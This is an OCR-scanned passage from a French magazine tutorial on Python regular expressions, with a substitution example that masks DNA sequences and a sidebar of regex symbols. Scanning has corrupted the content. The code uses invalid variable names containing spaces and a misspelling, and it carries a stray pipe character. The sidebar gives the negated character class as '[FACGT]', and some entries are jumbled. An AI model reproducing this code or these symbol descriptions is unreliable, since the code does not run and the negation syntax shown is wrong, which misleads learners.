autre chaîne. Voici la manière de 
procéder : 


import re 
PHRASE = 


"Le brin d'acide 





désoxyribonucléique extrait 
est composé ainsi : GCTATCG- 
TAC" | 

my first regex = 
re.compile(r"[ACGT]+") 

my frist regex.sub("extrait 
d'ADN confidentiel",PHRASE) 


Ce petit bout de code aura pour 
effet de substituer tout extrait 
d'ADN par le joli message « extrait 
d'ADN confidentiel » (loi 1978 ;-)). 
L'appel à sub() va remplacer, dans la 
chaîne passée en second argument, 
toute chaîne correspondant à l'ex- 
pression régulièrepar le premier 
argument (ici,notre message). 


Conclusion 

Les expressions régulières n'ont 

plus de secrets pour vous.Vous pou- 

vez manipuler les chaînes de carac- 

tères à votre guise. 

Le python commence a couler dans 

vos veines, Vous sentez sa puissance 

entrer en vous, lisez la suite et vous 

oublierez tout autre langage... 
SÉBASTIEN BAUBRU - 

KORETH- 


DE symboles permettent d'écrire des expressions régulières, notamment 
en Python. Voici quelques exemples : 


+ \d représente un chiffre 


* \w représente un chiffre OÙ une lettre OÙ un 
+ \s représente un espace (espace ou tabulation, plus d'autres suivant la plate 


forme) 


(soulignement) 


+ \D représente TOUT SAUF UN CHIFFRE (contraire de \d) 


+ \W représente TOUT SAUF UNE UN CHIFFRE OÙ UNE LETTRE OÙ 


UN ‘_" (contraire de \w) 


+ \S représente TOUT SAUF UN ESPACE (contraire de \s) 


+ \w+, \s* et \d? Correspondent donc à « un ou plusieurs caractère alphanu- 


mériques », « zéro ou plusieurs espaces » et « zéro ou un chiffre » 


+ Alors que [ACGT] représente « un À ou un C ou un G ou un T », [FACGT] 
représente son contraire (« tout SAUF un A ou un C ou un G ou un T ») 

+ Pour préciser plus spécifiquement le nombre d'occurrences, plutôt que d'utili- 
ser ?,+ ou *, on peut aussi utiliser la syntaxe {2,4}, {14}, {15,} ou {,47} qu 
représentent respectivement les expressions « entre deux et quatre fois », « 
quatorze fois précisément », « quinze fois au moins » et « quarante-sept fois 
au plus ». 

* Pour grouper des symboles, on utilise les parenthèses. Par exemple, pour expri- 
mer qu'une suite de symbole se repète au plus une fois, on pourra écrire l'expres- 
sion régulière "([a-z] \d.)?!!, ce qui permet de regler la portée du « ? » à toute la 
parenthèse (et c'est donc le groupe [a-z]\d. qui se répète zéro ou une fois). 
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